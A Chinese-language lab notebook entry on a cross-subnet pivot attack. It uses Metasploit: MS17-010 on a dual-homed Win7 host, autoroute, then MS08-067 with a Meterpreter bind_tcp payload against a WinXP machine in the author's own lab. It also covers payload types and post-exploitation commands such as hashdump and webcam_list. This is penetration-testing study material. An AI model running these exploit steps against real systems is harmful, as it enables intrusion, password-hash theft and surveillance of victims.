Day3跨网段攻击

294 阅读3分钟

接着上回的配置环境继续探索神奇事件

漏洞配置环境

  • 攻击机:kali(net): 192.168.28.129

  • 靶机:

    • win7(net、主机;双网卡): 192.168.28.128 ; 192.168.116.131
    • Winxp(主机): 192.168.116.129

知识点

  • 攻击载荷模块(payload): 攻击载荷是在渗透攻击成功后促使目标系统运行的一段植入代码。

    • Single 是一种完全独立的Payload,而且使用起来就像运行 calc.exe 一样简单,例如添加一个系统用户或删除一份文件。由于Single Payload是完全独立的,因此它们有可能会被类似 netcat 这样的非metasploit处理工具所捕捉到。

    • Stager 这种Payload负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。

      • 一种常见的Stager Payload就是reverse_tcp,它可以让目标系统与攻击者建立一条tcp连接,让目标系统主动连接我们的端口(反向连接)。
      • 另一种常见的是bind_tcp,它可以让目标系统开启一个tcp监听器,而攻击者随时可以与目标系统进行通信(正向连接)。

    正向连接bind_tcp

    • kali连接主机bind_tcp
    • 受害主机具有公网IP,与kali处于同一个网段
    • 被控主机有公网IP又不出网,考虑正向链接

    反向连接reverse_tcp

    • 主动连接时有防火墙,访问不了,通过发送一段代码,让主机自动连接kali
    • 被控主机出网,优先考虑反向连接
    • 出网,不出网   内网渗透具体

    • Stage 是Stager Payload下的一种Payload组件,这种Payload可以提供更加高级的功能,而且没有大小限制

    • Single Payload的格式为:/  如:windows/powershell_bind_tcp

    • Stager/Stage Payload的格式为:/  /  如:windows/meterpreter/bind_tcp

  • hashdump 查看目标系统用户名、密码的哈希值,通过解密可得。

  • screenshot 截图

  • webcam_list 摄像头

跨网段攻击(ms08-067漏洞复现)

  • kali-通过->win7-攻击->XP

  • 通过ms17-010漏洞拿到win7主机权限

  • 查看arp缓存,执行 arp -a命令

发现内网存在192.168.116.129的主机

XP的ip  

  • ^z返回meterpreter终端

将内网网段192.168.116.0/24添加至路由表,使用 autoroute 脚本;

run autoroute -s 192.168.116.0/24

run autoroute -p   //查看路由表映射情况

image.png

  • 将会话退出到后台 background

image.png

  • 由于内网主机是winXP 直接使用ms08-067进行攻击

search ms08-067

image.png

注意:这里payload只能使用正向连接

use 0 //攻击模块

set payload windows/meterpreter/bind_tcp //设置payload

set rhost 192.168.116.129 //设置攻击目标

set lhost 192.168.28.129 //设置攻击者

show options //查看配置

run //攻击

image.png

  • 攻击不成功

查找问题:
1.xp防火墙是否关闭;
2.xp端口是否开放;
3.xp不稳定,更换思路,用xp攻击win7,将xp设置成双网卡,重新上面步骤。

  • 我还有点不死心,让我再试一试

show targets //查看可攻击系统

image.png

set target 7 //设置攻击系统为7

image.png

  • 成功!

image.png

  • 截个图

image.png

参考文档:

Meterpreter后渗透常用命令

微软MS08-067漏洞,小白必看,超详细!!!_初学人的博客-CSDN博客